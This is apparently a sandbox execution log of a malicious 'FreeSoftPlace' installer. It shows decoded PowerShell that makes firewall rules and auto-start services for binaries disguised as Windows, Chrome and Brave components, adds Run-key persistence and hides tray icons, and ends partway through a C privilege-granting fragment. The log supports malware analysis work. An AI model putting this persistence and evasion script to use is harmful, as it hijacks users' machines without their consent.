C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C9345F958E073D9A352901F311135479 C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\FreeSoftPlace\2023.11.06\96C4929\FreeSoftPlace.msi MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH="C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe" SETUPEXEDIR="C:\Users\Admin\Desktop\New Compressed (zipped) Folder\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1700011584 " AI_EUIMSI=""

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 6FC05007F91D76C17A3DADA8AA1B62F4

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssFAE8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiFAD6.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrFAD7.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrFAE7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc 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

C:\Windows\system32\whoami.exe

"C:\Windows\system32\whoami.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\Desktop\New Compressed (zipped) Folder\e12d6a7452dd56cfb058ac5a364f0d008870b900b0da53b12c0c58f782488924.exe

"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\e12d6a7452dd56cfb058ac5a364f0d008870b900b0da53b12c0c58f782488924.exe"

C:\Users\Admin\Desktop\New Compressed (zipped) Folder\a8eabecac5183dd92d96c18f8b08b41e60c301261e378238f88f260ec5943264.exe

"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\a8eabecac5183dd92d96c18f8b08b41e60c301261e378238f88f260ec5943264.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss1BA4.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi1B92.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr1B93.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr1B94.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc N e w - N e t F i r e w a l l R u l e   - N a m e   " M i c r o s o f t   E d g e "   - D i s p l a y N a m e   " M i c r o s o f t   E d g e "   - G r o u p   " M i c r o s o f t   E d g e "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ d I l h o s t . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   S e a r c h "   - D i s p l a y N a m e   " W i n d o w s   S e a r c h "   - G r o u p   " W i n d o w s   S e a r c h "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ d l I h o s t . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " C h r o m e   U p d a t e "   - D i s p l a y N a m e   " C h r o m e   U p d a t e "   - G r o u p   " C h r o m e   U p d a t e "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ R u n t i m e B r o o k e r . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   T u n i n g "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   T u n i n g "   - G r o u p   " W i n d o w s   M e d i a   T u n i n g "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ B r a v e C r a s h H a n d l e r . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r "   - D i s p l a y N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r "   - G r o u p   " W i n d o w s   T e l e m e t r y   M a n a g e r "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ t r a f f m o n e t i z e r \ a p p \ T e x t l n p u t H o s t . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   S u b n e t w o r k   C o n t r o l "   - D i s p l a y N a m e   " W i n d o w s   S u b n e t w o r k   C o n t r o l "   - G r o u p   " W i n d o w s   S u b n e t w o r k   C o n t r o l "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ U s e r 0 0 B E B r o k e r . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " M e d i a   C e n t e r   E x t e n d e r   -   H T T P   S t r e a m i n g   ( T C P ) "   - D i s p l a y N a m e   " M e d i a   C e n t e r   E x t e n d e r   -   H T T P S   S t r e a m i n g   ( T C P ) "   - G r o u p   " M e d i a   C e n t e r   E x t e n d e r   -   H T T P S   S t r e a m i n g   ( T C P ) "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ . m y s t e r i u m - b i n \ I s a s s . e x e   - D i r e c t i o n   I n b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " B r a v e   B r o w s e r "   - D i s p l a y N a m e   " B r a v e   B r o w s e r "   - G r o u p   " B r a v e   B r o w s e r "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ d I l h o s t . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   P l a y e r "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   P l a y e r "   - G r o u p   " W i n d o w s   M e d i a   P l a y e r "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ d l I h o s t . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   C r e d e n t i a l s   S e r v i c e "   - D i s p l a y N a m e   " W i n d o w s   C r e d e n t i a l s   S e r v i c e "   - G r o u p   " W i n d o w s   C r e d e n t i a l s   S e r v i c e "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ R u n t i m e B r o o k e r . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n "   - D i s p l a y N a m e   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n "   - G r o u p   " W i n d o w s   M e d i a   S y n c h r o n i z a t i o n "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ B r a v e C r a s h H a n d l e r . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r   C o n t r o l "   - D i s p l a y N a m e   " W i n d o w s   T e l e m e t r y   M a n a g e r   C o n t r o l "   - G r o u p   " W i n d o w s   T e l e m e t r y   M a n a g e r   C o n t r o l "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ t r a f f m o n e t i z e r \ a p p \ T e x t l n p u t H o s t . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " W i n d o w s   S u b - n e t w o r k   C o n t r o l "   - D i s p l a y N a m e   " W i n d o w s   S u b n e t w o r k   C o n t r o l "   - G r o u p   " W i n d o w s   S u b n e t w o r k   C o n t r o l "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ A p p D a t a \ L o c a l \ T e m p \ U s e r 0 0 B E B r o k e r . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 N e w - N e t F i r e w a l l R u l e   - N a m e   " M e d i a   C e n t e r   E x t e n d e r   -   H T T P S   S t r e a m i n g   ( T C P ) "   - D i s p l a y N a m e   " M e d i a   C e n t e r   E x t e n d e r   -   H T T P S   S t r e a m i n g   ( T C P ) "   - G r o u p   " M e d i a   C e n t e r   E x t e n d e r   -   H T T P S   S t r e a m i n g   ( T C P ) "   - P r o g r a m   $ e n v : U S E R P R O F I L E \ . m y s t e r i u m - b i n \ I s a s s . e x e   - D i r e c t i o n   O u t b o u n d   - P r o f i l e   A n y   - A c t i o n   A l l o w   - E n a b l e d   T r u e 
 
 N e w - S e r v i c e   - N a m e   " D e v A s s o c M a n "   - D i s p l a y N a m e   " D e v i c e   A s s o c i a t i o n   M a n a g e r "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   D e v i c e   A s s o c i a t i o n   M a n a g e r   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r . e x e 
 N e w - S e r v i c e   - N a m e   " N g c C p m r S v c "   - D i s p l a y N a m e   " M i c r o s o f t   C r e d e n t i a l s   P a s s p o r t "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   M i c r o s o f t   C r e d e n t i a l s   P a s s p o r t   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : A P P D A T A \ G o o g l e C r a s h H a n d l e r 6 4 . e x e 
 N e w - S e r v i c e   - N a m e   " T i m e R a t i o S v c "   - D i s p l a y N a m e   " T i m e   R a t i o   S e r v i c e "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   T i m e   R a t i o   S e r v i c e   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r 6 4 . e x e 
 N e w - S e r v i c e   - N a m e   " P r o g r a m s C a c h e "   - D i s p l a y N a m e   " C a c h e   P r o g r a m   C o n t r o l "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   C a c h e   P r o g r a m   C o n t r o l   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r . e x e 
 N e w - S e r v i c e   - N a m e   " N o P e e r D i s t S v c "   - D i s p l a y N a m e   " S u b B r a n c h C a c h e "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   S u b B r a n c h C a c h e   P r o g r a m   C o n t r o l   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r A r m 6 4 . e x e 
 N e w - S e r v i c e   - N a m e   " S p o o l e r C o n t r o l "   - D i s p l a y N a m e   " S p o o l e r   A d v a n c e   C o n t r o l "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   S p o o l e r   P r o g r a m   C o n t r o l   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : U S E R P R O F I L E \ E m b m a k e . e x e 
 N e w - S e r v i c e   - N a m e   " T e l e m e t r y M g m t "   - D i s p l a y N a m e   " T e l e m e t r y   M a n a g e r "   - D e s c r i p t i o n   " M a n a g e s   a n d   i m p l e m e n t s   T e l e m e t r y   M a n a g e r   C o n t r o l   u s e d   f o r   b a c k u p   a n d   o t h e r   p u r p o s e s .   I f   t h i s   s e r v i c e   i s   s t o p p e d ,   s h a d o w   c o p i e s   w i l l   b e   u n a v a i l a b l e   f o r   b a c k u p   a n d   t h e   b a c k u p   m a y   f a i l .   I f   t h i s   s e r v i c e   i s   d i s a b l e d ,   a n y   s e r v i c e s   t h a t   e x p l i c i t l y   d e p e n d   o n   i t   w i l l   f a i l   t o   s t a r t . "   - S t a r t u p T y p e   " A u t o m a t i c "   - B i n a r y P a t h N a m e   $ e n v : U S E R P R O F I L E \ E m b e d i t . e x e 
 
 N e w - I t e m   - P a t h   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ "   - N a m e   " G r a p h i c s D r i v e r s "   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ G r a p h i c s D r i v e r s "   - N a m e   H w S c h M o d e   - V a l u e   2   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K L M : \ S Y S T E M \ C u r r e n t C o n t r o l S e t \ C o n t r o l \ G r a p h i c s D r i v e r s "   - N a m e   " H w S c h M o d "   - T y p e   D W o r d   - V a l u e   2   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S o f t w a r e \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ D a t a   C o l l e c t i o n \ "   - N a m e   A l l o w T e l e m e t r y   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ W i n d o w s   S e a r c h "   - N a m e   A l l o w C o r t a n a   - V a l u e   0   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n "   - N a m e   B r a v e C r a s h H a n d l e r   - V a l u e   $ e n v : A P P D A T A \ B r a v e C r a s h H a n d l e r . e x e   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ E x p l o r e r "   - N a m e   N o T r a y I t e m s D i s p l a y   - V a l u e   1   - P r o p e r t y T y p e   D W O R D   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ P o l i c i e s \ E x p l o r e r "   - N a m e   " N o T r a y I t e m s D i s p l a y "   - T y p e   D W o r d   - V a l u e   1   - F o r c e 
 N e w - I t e m P r o p e r t y   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   $ e n v : T E M P \ U s e r 0 0 B E B r o k e r . e x e   - V a l u e   " ~   R U N A S A D M I N "   - P r o p e r t y T y p e   S t r i n g   - F o r c e 
 S e t - I t e m P r o p e r t y   - P a t h   " H K C U : \ S o f t w a r e \ M i c r o s o f t \ W i n d o w s   N T \ C u r r e n t V e r s i o n \ A p p C o m p a t F l a g s \ L a y e r s "   - N a m e   $ e n v : T E M P \ U s e r 0 0 B E B r o k e r . e x e   - T y p e   S t r i n g   - V a l u e   " ~   R U N A S A D M I N "   - F o r c e 
 

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss448E.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi448B.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr448C.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr448D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc # d e f i n e   U N I C O D E 
 # d e f i n e   _ U N I C O D E 
 
 # i n c l u d e   < w i n d o w s . h > 
 # i n c l u d e   < n t s e c a p i . h > 
 # i n c l u d e   < n t s t a t u s . h > 
 # i n c l u d e   < S d d l . h > 
 
 v o i d   I n i t L s a S t r i n g ( P L S A _ U N I C O D E _ S T R I N G   L s a S t r i n g ,   L P W S T R   S t r i n g ) 
 { 
         D W O R D   S t r i n g L e n g t h ; 
 
         i f   ( S t r i n g   = =   N U L L )   { 
                 L s a S t r i n g - > B u f f e r   =   N U L L ; 
                 L s a S t r i n g - > L e n g t h   =   0 ; 
                 L s a S t r i n g - > M a x i m u m L e n g t h   =   0 ; 
                 r e t u r n ; 
         } 
 
         S t r i n g L e n g t h   =   w c s l e n ( S t r i n g ) ; 
         L s a S t r i n g - > B u f f e r   =   S t r i n g ; 
         L s a S t r i n g - > L e n g t h   =   ( U S H O R T ) S t r i n g L e n g t h   *   s i z e o f ( W C H A R ) ; 
         L s a S t r i n g - > M a x i m u m L e n g t h   =   ( U S H O R T ) ( S t r i n g L e n g t h   +   1 )   *   s i z e o f ( W C H A R ) ; 
 } 
 
 N T S T A T U S   O p e n P o l i c y ( L P W S T R   S e r v e r N a m e ,   D W O R D   D e s i r e d A c c e s s ,   P L S A _ H A N D L E   P o l i c y H a n d l e ) 
 { 
         L S A _ O B J E C T _ A T T R I B U T E S   O b j e c t A t t r i b u t e s ; 
         L S A _ U N I C O D E _ S T R I N G   S e r v e r S t r i n g ; 
         P L S A _ U N I C O D E _ S T R I N G   S e r v e r   =   N U L L ; 
 
         / /   
         / /   A l w a y s   i n i t i a l i z e   t h e   o b j e c t   a t t r i b u t e s   t o   a l l   z e r o e s . 
         / /   
         Z e r o M e m o r y ( & O b j e c t A t t r i b u t e s ,   s i z e o f ( O b j e c t A t t r i b u t e s ) ) ; 
 
         i f   ( S e r v e r N a m e   ! =   N U L L )   { 
                 / /   
                 / /   M a k e   a   L S A _ U N I C O D E _ S T R I N G   o u t   o f   t h e   L P W S T R   p a s s e d   i n 
                 / /   
                 I n i t L s a S t r i n g ( & S e r v e r S t r i n g ,   S e r v e r N a m e ) ; 
                 S e r v e r   =   & S e r v e r S t r i n g ; 
         } 
 
         / /   
         / /   A t t e m p t   t o   o p e n   t h e   p o l i c y . 
         / /   
         r e t u r n   L s a O p e n P o l i c y ( 
                 S e r v e r , 
                 & O b j e c t A t t r i b u t e s , 
                 D e s i r e d A c c e s s , 
                 P o l i c y H a n d l e 
         ) ; 
 } 
 
 N T S T A T U S   S e t P r i v i l e g e O n A c c o u n t ( L S A _ H A N D L E   P o l i c y H a n d l e ,   P S I D   A c c o u n t S i d ,   L P W S T R   P r i v i l e g e N a m e ,   B O O L   b E n a b l e ) 
 { 
         L S A _ U N I C O D E _ S T R I N G   P r i v i l e g e S t r i n g ; 
 
         / /   
         / /   C r e a t e   a   L S A _ U N I C O D E _ S T R I N G   f o r   t h e   p r i v i l e g e   n a m e . 
         / /   
         I n i t L s a S t r i n g ( & P r i v i l e g e S t r i n g ,   P r i v i l e g e N a m e ) ; 
 
         / /   
         / /   g r a n t   o r   r e v o k e   t h e   p r i v i l e g e ,   a c c o r d i n g l y 
         / /   
         i f   ( b E n a b l e )   { 
                 r e t u r n   L s a A d d A c c o u n t R i g h t s ( 
                         P o l i c y H a n d l e ,               / /   o p e n   p o l i c y   h a n d l e 
                         A c c o u n t S i d ,                   / /   t a r g e t   S I D 
                         & P r i v i l e g e S t r i n g ,       / /   p r i v i l e g e s 
                         1                                       / /   p r i v i l e g e   c o u n t 
                 ) ; 
         } 
         e l s e   { 
                 r e t u r n   L s a R e m o v e A c c o u n t R i g h t s ( 
                         P o l i c y H a n d l e ,               / /   o p e n   p o l i c y   h a n d l e 
                         A c c o u n t S i d ,                   / /   t a r g e t   S I D 
                         F A L S E ,                             / /   d o   n o t   d i s a b l e   a l l   r i g h t s 
                         & P r i v i l e g e S t r i n g ,       / /   p r i v i l e g e s 
                         1                                       / /   p r i v i l e g e   c o u n t 
                 ) ; 
         } 
 } 
 
 v o i d   m a i n ( ) 
 { 
         H A N D L E   h T o k e n   =   N U L L ; 
 
         i f   ( ! O p e n P r o c e s s T o k e n ( G e t C u r r e n t P r o c e s s ( ) ,   T O K E N _ Q U E R Y ,   & h T o k e n ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " O p e n P r o c e s s T o k e n   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
                 r e t u r n   - 1 ; 
         } 
 
         D W O R D   d w B u f f e r S i z e   =   0 ; 
 
         / /   P r o b e   t h e   b u f f e r   s i z e   r e q i r e d   f o r   P T O K E N _ U S E R   s t r u c t u r e 
         i f   ( ! G e t T o k e n I n f o r m a t i o n ( h T o k e n ,   T o k e n U s e r ,   N U L L ,   0 ,   & d w B u f f e r S i z e )   & & 
                 ( G e t L a s t E r r o r ( )   ! =   E R R O R _ I N S U F F I C I E N T _ B U F F E R ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " G e t T o k e n I n f o r m a t i o n   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
 
                 / /   C l e a n u p 
                 C l o s e H a n d l e ( h T o k e n ) ; 
                 h T o k e n   =   N U L L ; 
 
                 r e t u r n   - 1 ; 
         } 
 
         P T O K E N _ U S E R   p T o k e n U s e r   =   ( P T O K E N _ U S E R )   m a l l o c ( d w B u f f e r S i z e ) ; 
 
         / /   R e t r i e v e   t h e   t o k e n   i n f o r m a t i o n   i n   a   T O K E N _ U S E R   s t r u c t u r e 
         i f   ( ! G e t T o k e n I n f o r m a t i o n ( 
                 h T o k e n , 
                 T o k e n U s e r , 
                 p T o k e n U s e r , 
                 d w B u f f e r S i z e , 
                 & d w B u f f e r S i z e ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " G e t T o k e n I n f o r m a t i o n   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
 
                 / /   C l e a n u p 
                 C l o s e H a n d l e ( h T o k e n ) ; 
                 h T o k e n   =   N U L L ; 
 
                 r e t u r n   - 1 ; 
         } 
 
         / /   P r i n t   S I D   s t r i n g 
         L P W S T R   s t r s i d ; 
         C o n v e r t S i d T o S t r i n g S i d ( p T o k e n U s e r - > U s e r . S i d ,   & s t r s i d ) ; 
         a p p l o g ( L O G _ I N F O ,   " U s e r   S I D :   % S \ n " ,   s t r s i d ) ; 
 
         / /   C l e a n u p 
         C l o s e H a n d l e ( h T o k e n ) ; 
         h T o k e n   =   N U L L ; 
 
         N T S T A T U S   s t a t u s ; 
         L S A _ H A N D L E   p o l i c y H a n d l e ; 
 
         i f   ( s t a t u s   =   O p e n P o l i c y ( N U L L ,   P O L I C Y _ C R E A T E _ A C C O U N T   |   P O L I C Y _ L O O K U P _ N A M E S ,   & p o l i c y H a n d l e ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " O p e n P o l i c y   % d " ,   s t a t u s ) ; 
         } 
 
         / /   A d d   n e w   p r i v e l e g e   t o   t h e   a c c o u n t 
         i f   ( s t a t u s   =   S e t P r i v i l e g e O n A c c o u n t ( p o l i c y H a n d l e ,   p T o k e n U s e r - > U s e r . S i d ,   S E _ L O C K _ M E M O R Y _ N A M E ,   T R U E ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " O p e n P S e t P r i v i l e g e O n A c c o u n t o l i c y   % d " ,   s t a t u s ) ; 
         } 
 
         / /   E n a b l e   t h i s   p r i v e l e d g e   f o r   t h e   c u r r e n t   p r o c e s s 
         h T o k e n   =   N U L L ; 
         T O K E N _ P R I V I L E G E S   t p ; 
 
         i f   ( ! O p e n P r o c e s s T o k e n ( G e t C u r r e n t P r o c e s s ( ) ,   T O K E N _ Q U E R Y   |   T O K E N _ A D J U S T _ P R I V I L E G E S ,   & h T o k e n ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " O p e n P r o c e s s T o k e n   # 2   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
                 r e t u r n   - 1 ; 
         } 
 
         t p . P r i v i l e g e C o u n t   =   1 ; 
         t p . P r i v i l e g e s [ 0 ] . A t t r i b u t e s   =   S E _ P R I V I L E G E _ E N A B L E D ; 
 
         i f   ( ! L o o k u p P r i v i l e g e V a l u e ( N U L L ,   S E _ L O C K _ M E M O R Y _ N A M E ,   & t p . P r i v i l e g e s [ 0 ] . L u i d ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " L o o k u p P r i v i l e g e V a l u e   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
                 r e t u r n   - 1 ; 
         } 
 
         B O O L   r e s u l t   =   A d j u s t T o k e n P r i v i l e g e s ( h T o k e n ,   F A L S E ,   & t p ,   0 ,   ( P T O K E N _ P R I V I L E G E S ) N U L L ,   0 ) ; 
         D W O R D   e r r o r   =   G e t L a s t E r r o r ( ) ; 
 
         i f   ( ! r e s u l t   | |   ( e r r o r   ! =   E R R O R _ S U C C E S S ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " A d j u s t T o k e n P r i v i l e g e s   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   e r r o r ) ; 
                 r e t u r n   - 1 ; 
         } 
 
         / /   C l e a n u p 
         C l o s e H a n d l e ( h T o k e n ) ; 
         h T o k e n   =   N U L L ; 
 
         S I Z E _ T   p a g e S i z e   =   G e t L a r g e P a g e M i n i m u m ( ) ; 
 
         / /   F i n a l l y   a l l o c a t e   t h e   m e m o r y 
